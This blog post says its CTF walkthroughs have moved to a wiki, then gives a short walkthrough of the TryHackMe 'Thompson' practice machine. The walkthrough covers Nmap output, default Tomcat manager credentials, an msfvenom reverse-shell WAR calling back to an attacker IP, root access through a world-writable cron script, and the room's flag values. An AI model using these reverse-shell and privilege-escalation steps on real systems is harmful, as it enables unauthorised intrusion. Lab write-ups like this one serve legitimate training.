
Where are all of the CTF Walkthroughs?
I moved the "non-blog" material.
So, I moved most of the "Capture the Flag walkthrough" material over to a wiki, powered by MediaWiki. I figured the wiki format is designed to make information like that easily accessible. It provides a place for there to be tons and tons of articles that aren't necessarily related, without the need for something like a menu to navigate or going back to Google search for the content.
Here's a more recent CTF walkthrough, since you may have expected that content here. Again, this one is duplicated over on the Wiki, where the rest of them now reside.
[Thompson] - TryHackMe
You can find this guide to the [Thompson] room on TryHackMe.com duplicated over on the MediaWiki, for example.
boot2root machine for FIT and bsides guatemala CTF
![[Thompson] - TryHackMe](https://www.grayhatfreelancing.com/media/posts/46/thomas-walkthrough-tryhackme.png)
Enumeration:
Nmap scan report for 10.10.238.164
Host is up, received echo-reply ttl 61 (0.099s latency).
Scanned at 2022-04-06 03:06:05 EDT for 19s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc052481987eb8db0592a6e78eb02111 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1
| 256 60c840abb009843d46646113fabc1fbe (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM=
| 256 b5527e9c019b980c73592035ee23f1a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33
8009/tcp open ajp13 syn-ack ttl 61 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http syn-ack ttl 61 Apache Tomcat 8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
http://10.10.28.152:8080/manager/html
<user username="tomcat" password="s3cret" roles="manager-gui"/>
Log into /manager/html and notice you can upload JSP .war files.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.6.1.201 LPORT=4444 -f war -oset shell.war
Start msfconsole > user exploit/multi/handler > set PAYLOAD java/jsp_shell_reverse_tcp > set LHOST 10.6.1.201 > run
Click on the link to shell from the manage page and the user flag is in /home/jake/user.txt
(your username will be tomcat)
Notice id.sh is /home/jake and is world read/write/execute.. also notice it's called by crontab every minute or so by user 'root', inject another reverse shell and you're root. Roof's flag is in /root/root.txt
user.txt
39400c90bc683a41a8935e4719f181bfc
root.txt
d89d5391984c0450a95497153ae7ca3a
Comments